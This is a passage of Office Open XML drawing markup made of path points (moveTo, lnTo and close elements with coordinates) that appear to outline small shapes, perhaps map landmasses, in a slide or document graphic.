                  <a:pt x="11815" y="2033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11874" y="2008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11835" y="1971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11837" y="1897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11898" y="1969"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11926" y="1971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11970" y="1902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12059" y="1909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12098" y="1868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12029" y="1835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11980" y="1804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11849" y="1779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11759" y="1724"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5961" y="1804"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5806" y="1848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5745" y="1813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5624" y="1905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5567" y="2010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5622" y="2044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5722" y="2022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5770" y="2045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5917" y="1971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5966" y="1921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5959" y="1879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5961" y="1804"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12465" y="1806"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12402" y="1823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12386" y="1853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12384" y="1895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12466" y="1904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12537" y="1884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12515" y="1842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12465" y="1806"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12581" y="1917"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12480" y="1958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12424" y="1995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12397" y="2042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12416" y="2035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12456" y="2065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12547" y="2074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12579" y="2099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12672" y="2049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12606" y="2017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12675" y="1981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12655" y="1946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12581" y="1917"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13131" y="1964"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13014" y="1975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13014" y="2006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13069" y="2040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13099" y="2044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13131" y="1964"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6082" y="1991"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5986" y="2025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5861" y="2040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5888" y="2067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5833" y="2091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5799" y="2074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5748" y="2092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5652" y="2173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5531" y="2229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5466" y="2230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5570" y="2131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5501" y="2131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5400" y="2178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5430" y="2116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5365" y="2143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5240" y="2256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5272" y="2198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5249" y="2124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5188" y="2166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5185" y="2205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5109" y="2272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5122" y="2306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5067" y="2345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4994" y="2459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4914" y="2557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4929" y="2606"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5018" y="2560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5028" y="2587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5105" y="2575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5196" y="2485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5264" y="2454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5447" y="2385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5508" y="2336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5730" y="2251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5797" y="2183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5865" y="2227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5961" y="2234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6021" y="2166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6060" y="2107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6144" y="2161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6198" y="2092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6253" y="2047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6193" y="2006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6082" y="1991"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11918" y="2015"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11791" y="2059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11724" y="2070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11734" y="2114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11701" y="2183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11729" y="2219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11754" y="2257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11734" y="2320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11795" y="2341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11808" y="2316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11840" y="2323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11891" y="2304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11956" y="2277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11990" y="2230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11995" y="2188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11941" y="2163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11992" y="2151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12030" y="2123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12037" y="2072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11983" y="2032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11918" y="2015"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12153" y="2020"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12138" y="2028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12142" y="2054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12206" y="2087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12227" y="2062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12172" y="2025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12153" y="2020"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12162" y="2096"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12115" y="2119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12113" y="2165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12121" y="2180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12155" y="2203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12200" y="2170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12231" y="2134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12231" y="2104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12162" y="2096"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12874" y="2106"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12791" y="2118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12732" y="2150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12759" y="2176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12810" y="2188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12775" y="2217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12719" y="2252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12732" y="2283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12808" y="2284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12899" y="2200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12943" y="2249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12907" y="2321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12931" y="2409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12998" y="2422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13182" y="2422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13172" y="2377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13027" y="2256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13152" y="2294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13195" y="2277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13147" y="2235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13005" y="2185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12874" y="2106"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12298" y="2150"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12259" y="2187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12224" y="2234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12251" y="2306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12283" y="2350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12332" y="2323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12332" y="2284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12396" y="2283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12340" y="2239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12333" y="2187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12298" y="2150"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13386" y="2296"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13354" y="2345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13337" y="2384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13396" y="2464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13399" y="2515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13502" y="2619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13579" y="2575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13707" y="2594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13860" y="2612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13921" y="2621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13948" y="2527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14003" y="2501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13850" y="2409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13784" y="2417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13640" y="2390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13460" y="2328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13386" y="2296"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12621" y="2345"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12571" y="2353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12583" y="2392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12633" y="2419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12699" y="2421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12711" y="2370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12621" y="2345"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12480" y="2385"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12482" y="2422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12488" y="2436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12554" y="2441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12576" y="2434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12537" y="2399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12480" y="2385"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12894" y="2449"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12773" y="2479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12827" y="2505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12857" y="2543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13003" y="2574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13160" y="2597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13165" y="2554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13104" y="2513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12995" y="2478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12966" y="2454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12894" y="2449"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17247" y="2870"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17200" y="2878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17200" y="2939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17165" y="2956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17136" y="2968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17168" y="3037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17176" y="3077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17193" y="3149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17228" y="3166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17284" y="3163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17260" y="3089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17289" y="3089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17291" y="3033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17323" y="3025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17292" y="2915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17247" y="2870"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9026" y="2875"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8879" y="2880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8709" y="2919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8642" y="2956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8588" y="2929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8457" y="2988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8452" y="3023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8597" y="3037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8624" y="3060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8751" y="3074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8807" y="3138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8964" y="3055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9036" y="3028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9041" y="2996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8984" y="2983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8994" y="2951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9061" y="2942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9026" y="2875"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9081" y="3038"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8990" y="3062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8979" y="3094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8928" y="3099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8883" y="3171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8895" y="3239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8990" y="3266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9059" y="3217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9113" y="3160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9063" y="3139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9113" y="3107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9081" y="3038"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8684" y="3123"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8622" y="3141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8580" y="3124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8526" y="3176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8592" y="3234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="3192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8709" y="3176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8684" y="3123"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5121" y="3128"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5055" y="3153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4937" y="3252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5036" y="3261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5121" y="3218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5121" y="3128"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16858" y="3257"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16902" y="3333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16899" y="3362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16946" y="3380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17005" y="3388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17032" y="3365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17085" y="3358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17127" y="3333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17114" y="3303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17032" y="3331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16858" y="3257"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9147" y="3634"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9160" y="3681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9100" y="3688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9068" y="3727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9108" y="3742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9139" y="3734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9162" y="3749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9199" y="3767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9229" y="3764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9253" y="3720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9214" y="3712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9167" y="3715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9213" y="3693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9196" y="3663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9147" y="3634"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3463" y="3636"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3429" y="3641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3338" y="3707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3291" y="3764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3365" y="3742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3476" y="3670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3463" y="3636"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3298" y="3693"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3220" y="3754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3084" y="3843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3035" y="3899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3050" y="3914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3020" y="3961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3161" y="3880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3272" y="3772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3262" y="3747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3298" y="3693"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="8347" y="4318"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8278" y="4368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8083" y="4368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8083" y="4410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7898" y="4417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="4466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7752" y="4446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7664" y="4499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7662" y="4595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7597" y="4648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7662" y="4789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7693" y="4804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7772" y="4649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7901" y="4562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8095" y="4525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8287" y="4479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8514" y="4479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8666" y="4515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8834" y="4553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8898" y="4535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8935" y="4474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8866" y="4442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8767" y="4437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8659" y="4368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8482" y="4338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8347" y="4318"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2766" y="4328"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2715" y="4355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2599" y="4536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2567" y="4599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2496" y="4708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2543" y="4686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2584" y="4644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2658" y="4616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2676" y="4545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2705" y="4452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2766" y="4328"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10184" y="4360"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10110" y="4373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9980" y="4442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10002" y="4483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9963" y="4592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9985" y="4664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10056" y="4735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10140" y="4737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10204" y="4607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10201" y="4447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10184" y="4360"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16633" y="4552"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16580" y="4558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16567" y="4599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16587" y="4649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16638" y="4742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16712" y="4769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16757" y="4752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16703" y="4649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16633" y="4552"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10239" y="4686"/>
                </a:moveTo>
                <a:lnTo>
